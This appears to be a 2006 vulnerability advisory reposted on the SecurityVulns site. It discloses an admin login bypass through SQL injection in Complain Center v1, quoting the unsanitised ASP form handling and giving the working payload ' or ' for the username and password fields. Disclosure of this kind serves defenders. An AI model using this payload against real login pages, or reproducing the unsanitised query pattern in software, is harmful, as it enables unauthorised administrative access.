Информационная безопасность
[RU] switch to
English Version



Дополнительная информация

  Ежедневная сводка ошибок в Web-приложениях (PHP, ASP, JSP, CGI, Perl)

  easypage.org >> v7 sql injection

  Limbo - Lite Mambo CMS Multiple Vulnerabilities

  Roller Weblogger XSS vulnerability

  BolinOS v.4.5.5 <= (gBRootPath) Remote File Include Vulnerability

From:ajannhwt_(at)_hotmail.com <ajannhwt_(at)_hotmail.com>
Date:18 сентября 2006 г.
Subject:Complain Center v1(loginprocess.asp) Admin ByPASS SQL Injection

ENGLISH

# Title  :   Complain Center v1(loginprocess.asp) Admin ByPASS SQL Injection

# Author :   ajann

# Exploit;

[CODE]

loginprocess.asp:
..
...
dim varUser
dim varPass
varUser=Request.Form("TxtUser") No Secure : )
varPass=Request.Form("TxtPass") No Secure : )
..
...

//Before join login page
http://[target]/[path]/login.asp

Username : ' or '
Password : ' or ' and Login Ok

# ajann,Turkey

О сайте | Условия использования
© SecurityVulns, 3APA3A, Владимир Дубровин
Нижний Новгород

 
 



Rating@Mail.ru
test server